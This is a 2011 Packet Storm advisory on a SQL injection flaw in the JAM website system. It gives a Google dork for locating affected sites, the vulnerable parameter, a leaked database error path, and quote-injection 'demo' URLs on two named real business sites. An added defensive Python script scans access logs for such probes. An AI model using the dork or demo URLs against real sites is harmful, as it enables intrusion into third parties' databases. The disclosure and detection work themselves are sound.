JAM SQL Injection

2011-09-14T00:00:00
ID PACKETSTORM:105112
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-09-14T00:00:00

Description

                                        
` _________________________________________________________
#   
# Exploit Title: JAM SQL Injection Vulnerability   
# Google Dork: intext:"This site is preserved by JAM"   
# Date: 2011-15-09   
# Author: nGa Sa Lu [ N-S-L ]   
# Service Link: http://www.jamarketing.co.nz   
# Tested on: Debian GNU/Linux 5.0   
# ________________________________________________________   
  
------------------------------------------------------------------------------------------------  
www.localhost.com/products.php?action=viewCategoryProducts&page=1&categoryId=[SQL]  
------------------------------------------------------------------------------------------------  
  
# SQL Error Statement  
------------------------  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jenniferannweb/advancehire.co.nz/functions.php on line 143  
  
# Demo  
---------  
http://www.advancehire.co.nz/products.php?action=viewCategoryProducts&page=1&categoryId=30'  
http://www.bellachic.co.nz/product_reviews_info.php?products_id=537&reviews_id=52'  
`
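An added example, not part of the original advisory: a log check a site operator could run to find requests where the numeric parameters shown in the URLs above (`categoryId`, `page`, `products_id`, `reviews_id`) carry non-integer values. The combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory's URLs show as numeric identifiers.
NUMERIC_PARAMS = {"categoryId", "page", "products_id", "reviews_id"}
# Scripts named in the advisory.
WATCHED_SCRIPTS = {"/products.php", "/product_reviews_info.php"}

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(target):
    """Return [(name, value)] for numeric parameters holding non-integers."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_SCRIPTS:
        return []
    # parse_qsl percent-decodes, so an encoded quote (%27) is caught too.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [(k, v) for k, v in pairs
            if k in NUMERIC_PARAMS and not INT_RE.fullmatch(v)]

def scan(lines):
    """Yield (client_ip, target, findings) for each flagged log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group(1))
        if findings:
            yield line.split(" ", 1)[0], m.group(1), findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2011:10:00:01 +1200] "GET /products.php?action=viewCategoryProducts&page=1&categoryId=30 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Sep/2011:10:00:05 +1200] "GET /products.php?action=viewCategoryProducts&page=1&categoryId=30%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [14/Sep/2011:10:00:09 +1200] "GET /product_reviews_info.php?products_id=537&reviews_id=52\' HTTP/1.1" 200 298',
    '203.0.113.4 - - [14/Sep/2011:10:01:00 +1200] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, findings)
```

The same integer check belongs in the application before the value reaches the query, alongside parameterized queries.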